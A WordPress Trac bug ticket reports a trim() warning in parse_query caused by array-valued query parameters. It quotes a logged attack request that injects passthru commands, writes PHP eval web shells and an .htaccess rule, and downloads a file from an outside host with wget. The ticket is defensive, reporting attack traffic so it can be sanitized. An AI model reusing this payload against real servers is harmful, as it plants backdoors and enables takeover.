[wp-trac] [WordPress Trac] #46797: parse_query: E_WARNING: trim() expects parameter 1 to be string, array given
    WordPress Trac 
    noreply at wordpress.org
       
    Thu Apr  4 13:20:29 UTC 2019
    
    
  
#46797: parse_query: E_WARNING: trim() expects parameter 1 to be string, array
given
--------------------------+-----------------------------
 Reporter:  conner_bw     |      Owner:  (none)
     Type:  defect (bug)  |     Status:  new
 Priority:  normal        |  Milestone:  Awaiting Review
Component:  Query         |    Version:  5.1
 Severity:  normal        |   Keywords:
  Focuses:                |
--------------------------+-----------------------------
 We keep seeing E_WARNING: trim() expects parameter 1 to be string, array
 given in our New Relic logs.
 The problem is this line of code:
 {{{
 $qv['name'] = trim( $qv['name'] );
 }}}
 Source: https://github.com/WordPress/wordpress-
 develop/blob/a0ca5afd8977b5a3857084d9cb1bd345166e2f21/src/wp-includes
 /class-wp-query.php#L764
 A (malicious) user sends a request that looks like:
 {{{
 > GET
 /?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=echo
 'Vuln!! patch it Now!' > vuln.htm; echo 'Vuln!!<?php @eval($_POST['pass'])
 ?>'> sites/default/files/vuln.php; echo 'Vuln!!<?php @eval($_POST['pass'])
 ?>'> vuln.php; cd sites/default/files/; echo 'AddType application/x-httpd-
 php .jpg' > .htaccess; wget 'http://40k.waszmann.de/Deutsch/images/up.php'
 }}}
 Such a request makes `$qv['name']` an array, not a string.
 Needs to be sanitized.
-- 
Ticket URL: <https://core.trac.wordpress.org/ticket/46797>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
    
    
More information about the wp-trac
mailing list